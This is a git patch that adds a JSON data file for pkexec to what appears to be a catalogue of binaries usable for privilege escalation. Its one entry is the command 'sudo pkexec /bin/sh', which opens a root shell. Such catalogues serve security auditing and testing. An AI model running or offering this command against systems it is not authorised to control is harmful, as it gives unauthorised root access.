From 2eb534329a5e9ba72d4b8950a1fd35e00508465f Mon Sep 17 00:00:00 2001 From: t0thkr1s Date: Sun, 7 Jun 2020 07:11:12 +0200 Subject: [PATCH] add data source for pkexec --- data/pkexec.json | 9 +++++++++ 1 file changed, 9 insertions(+) create mode 100644 data/pkexec.json diff --git a/data/pkexec.json b/data/pkexec.json new file mode 100644 index 0000000..c42e257 --- /dev/null +++ b/data/pkexec.json @@ -0,0 +1,9 @@ +{ + "functions": { + "sudo": [ + { + "code": "sudo pkexec /bin/sh" + } + ] + } +} \ No newline at end of file